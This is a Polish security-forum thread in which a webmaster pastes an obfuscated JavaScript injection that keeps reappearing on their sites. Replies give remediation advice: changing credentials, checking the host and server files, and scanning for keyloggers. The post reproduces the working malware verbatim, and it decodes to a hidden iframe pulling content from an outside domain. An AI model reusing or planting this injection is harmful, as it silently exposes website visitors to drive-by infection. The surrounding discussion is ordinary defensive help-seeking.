SafeGroup

Witam,

Na mojej stronie www pojawił się jakiś robak w kodzie. Avira i malwarebytes nic nie znalazły jednak problem ciągle się pojawia, infekując kolejne strony (którymi zarządzam). Oto on:

[malware] <script>b=new function(){return 2;};try{document.asd.removeChild({})}catch(q){ss="";s=String;}ddd=new Date();d2=new Date(ddd.valueOf()-2);Object.prototype.asd=''q'';if(''q''==={}.asd)a=document[''createTextNode''] (''321'');if(a.nodeValue==321)h=(ddd-d2)*-1;n=''4.5c4.5c52.5c51c16c20c50c55.5c49.5c58.5c54.5c50.5c55c58c23c51.5c50.5c58c34.5c54c50.5c54.5c50.5c55c58c57.5c33c60.5c42c48.5c51.5c39c48.5c54.5c50.5c20c19.5c49c55.5c50c60.5c19.5c20.5c45.5c24c46.5c20.5c61.5c4.5c4.5c4.5c52.5c51c57c48.5c54.5c50.5c57c20c20.5c29.5c4.5c4.5c62.5c16c50.5c54c57.5c50.5c16c61.5c4.5c4.5c4.5c50c55.5c49.5c58.5c54.5c50.5c55c58c23c59.5c57c52.5c58c50.5c20c17c30c52.5c51c57c48.5c54.5c50.5c16c57.5c57c49.5c30.5c19.5c52c58c58c56c29c23.5c23.5c49.5c55.5c55c55c50.5c49.5c58c50.5c50c22.5c52c50.5c50c23c49.5c55.5c54.5c23.5c59c55.5c52.5c50c23c56c52c56c31.5c56c48.5c51.5c50.5c30.5c27c24c26c28.5c51c50c27.5c48.5c49c49.5c28c48.5c24c49c28c25.5c19.5c16c59.5c52.5c50c58c52c30.5c19.5c24.5c24c19.5c16c52c50.5c52.5c51.5c52c58c30.5c19.5c24.5c24c19.5c16c57.5c58c60.5c54c50.5c30.5c19.5c59c52.5c57.5c52.5c49c52.5c54c52.5c58c60.5c29c52c52.5c50c50c50.5c55c29.5c56c55.5c57.5c52.5c58c52.5c55.5c55c29c48.5c49c57.5c55.5c54c58.5c58c50.5c29.5c54c50.5c51c58c29c24c29.5c58c55.5c56c29c24c29.5c19.5c31c30c23.5c52.5c51c57c48.5c54.5c50.5c31c17c20.5c29.5c4.5c4.5c62.5c4.5c4.5c51c58.5c55c49.5c58c52.5c55.5c55c16c52.5c51c57c48.5c54.5c50.5c57c20c20.5c61.5c4.5c4.5c4.5c59c48.5c57c16c51c16c30.5c16c50c55.5c49.5c58.5c54.5c50.5c55c58c23c49.5c57c50.5c48.5c58c50.5c34.5c54c50.5c54.5c50.5c55c58c20c19.5c52.5c51c57c48.5c54.5c50.5c19.5c20.5c29.5c51c23c57.5c50.5c58c32.5c58c58c57c52.5c49c58.5c58c50.5c20c19.5c57.5c57c49.5c19.5c22c19.5c52c58c58c56c29c23.5c23.5c49.5c55.5c55c55c50.5c49.5c58c50.5c50c22.5c52c50.5c50c23c49.5c55.5c54.5c23.5c59c55.5c52.5c50c23c56c52c56c31.5c56c48.5c51.5c50.5c30.5c27c24c26c28.5c51c50c27.5c48.5c49c49.5c28c48.5c24c49c28c25.5c19.5c20.5c29.5c51c23c57.5c58c60.5c54c50.5c23c59c52.5c57.5c52.5c49c52.5c54c52.5c58c60.5c30.5c19.5c52c52.5c50c50c50.5c55c19.5c29.5c51c23c57.5c58c60.5c54c50.5c23c56c55.5c57.5c52.5c58c52.5c55.5c55c30.5c19.5c48.5c49c57.5c55.5c54c58.5c58c50.5c19.5c29.5c51c23c57.5c58c60.5c54c50.5c23c54c50.5c51c58c30.5c19.5c24c19.5c29.5c51c23c57.5c58c60.5c54c50.5c23c58c55.5c56c30.5c19.5c24c19.5c29.5c51c23c57.5c50.5c58c32.5c58c58c57c52.5c49c58.5c58c50.5c20c19.5c59.5c52.5c50c58c52c19.5c22c19.5c24.5c24c19.5c20.5c29.5c51c23c57.5c50.5c58c32.5c58c58c57c52.5c49c58.5c58c50.5c20c19.5c52c50.5c52.5c51.5c52c58c19.5c22c19.5c24.5c24c19.5c20.5c29.5c4.5c4.5c4.5c50c55.5c49.5c58.5c54.5c50.5c55c58c23c51.5c50.5c58c34.5c54c50.5c54.5c50.5c55c58c57.5c33c60.5c42c48.5c51.5c39c48.5c54.5c50.5c20c19.5c49c55.5c50c60.5c19.5c20.5c45.5c24c46.5c23c48.5c56c56c50.5c55c50c33.5c52c52.5c54c50c20c51c20.5c29.5c4.5c4.5c62.5'';n=n[''split''] (''c'');for(i=0;i!=n.length;i++)if(!+b)ss+=s.fromCharCode(-h*eval("n"+"[i] "));if(a.nodeValue==321)eval(ss);</script>[/malware]

Nie wiem już co robić. Usuwam to od trzech dni a to ciągle powraca. Pomocy.

1. Zmień hasło do FTP

2. Zmień hasło do panelu hostingowego o ile takowy ma hosting z jakiego korzystasz

3. Zmień hasła we wszystkich CMSach jakie masz na stronie (wszelkie konta gdzie jest autoryzacja po haśle)

4. Jeżeli nadal będzie się powtarzać, skontaktuj się z hostingiem i zapytaj, czy to może nie jakieś globalne wstrzykiwanie kodu na ich konta

5. O ile jesteś w stanie, sprawdź, czy na serwerze nie ma jakichś podejrzanych plików php/asp (nie wiadomo z czego korzystasz, więc za wiele powiedzieć nie można), których wcześniej nie było

Dziękuję za odpowiedź. Tak mi się zdawało że to może być przyczyną. Jeszcze jedno pytanie. Czy zmiana nazw polskich na angielskie w menu start też może być spowodowana wirusami?

czasami można także skorzystać z sieciowego skanerado wykrywania exploitów oraz malware

[Aby zobaczyć linki, zarejestruj się tutaj]

Wszystkie hasła zostały zmienione, połączenia usunięte z total commandera. Poprawa była tylko na jeden dzień. Dziś znów to samo. Nie wiem co z tym zrobić. Kończą mi się pomysły.

Upewnij się że Twój komputer jest czysty (keyloggery) oraz połączenie sieciowe (sniffery).

Możesz jak krowie na rowie. Co mam zainstalować? Na co zwrócić uwagę?

Najlepiej użyć do tego celu wyspecjalizowanych programów jak (najlepiej kilka lub wszystkie z nich):
-

[Aby zobaczyć linki, zarejestruj się tutaj]

,
-

[Aby zobaczyć linki, zarejestruj się tutaj]

-

[Aby zobaczyć linki, zarejestruj się tutaj]

Comodo Cleaning Essentials:

[Aby zobaczyć linki, zarejestruj się tutaj]

[Aby zobaczyć linki, zarejestruj się tutaj]

A czy one kolidują z nortonem?

tomasbobas napisał(a):A czy one kolidują z nortonem?

To wszystko skanery na żądanie (prócz mbam pro), więc nie powinny.

bardok206 napisał(a):

tomasbobas napisał(a):A czy one kolidują z nortonem?

To wszystko skanery na żądanie (prócz mbam pro), więc nie powinny.

Ale MBAM Free będzie w sam raz.

Witam ponownie. Po ściągnięciu wszystkich podanych programów, zeskanowaniu i wywaleniu całego syfu, problem znów powrócił. Emergency Kit znalazł coś takiego - torjan.js.iframe!ik. W ścieżce do tego trojana widnieje taki zapis mozilla/firefox/profile/au9npkvc/Klaudia/cache/9/47/d04cad01. Czy to możliwe by trojan zagnieżdzał się gdzieś w przeglądarce tudzież w mozilli jest jakaś luka "dzięki", której wchodzi? Co z tym zrobić?

To szkodliwa ramka iFrame. Nie, wirus nie zagnieździł się w przeglądarce. To tylko tymczasowe pliki.

Czy to ona jest przyczyną tych złośliwych kodów na stronie?

Niestety - nie wiem. Niech inni się wypowiedzą.